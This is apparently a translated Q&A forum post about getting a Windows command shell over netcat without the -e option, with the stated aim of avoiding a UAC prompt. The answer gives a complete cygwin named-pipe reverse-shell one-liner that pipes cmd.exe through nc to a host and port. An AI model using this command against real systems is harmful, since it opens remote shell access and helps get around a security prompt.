由于它会触发 UAC,有没有办法在 Windows 中使用 netcat 来获取反向 shell,而无需使用 -e 选项?
我使用命名管道使其在 Linux 和 Linux 之间运行。我想在 Windows 中实现类似的功能。
在 Windows 上运行会c:\windows\system32\cmd.exe | ncat -l -p 666
在我连接时在 Linux 中给出提示:
# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user> dir
^C
看起来我已经很接近了,也许缺少了一些简单的东西?如果 Windows 中有命名管道就好了……
答案1
我不确定你是否可以使用纯 win32 netcat 来做到这一点,但你可以在 cygwin 中做到这一点。在 1234 上监听,然后nc -l 1234
使用以下命令在单独的窗口中连接到它:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f
请注意,使用此方法时,上下键无法循环浏览命令历史记录。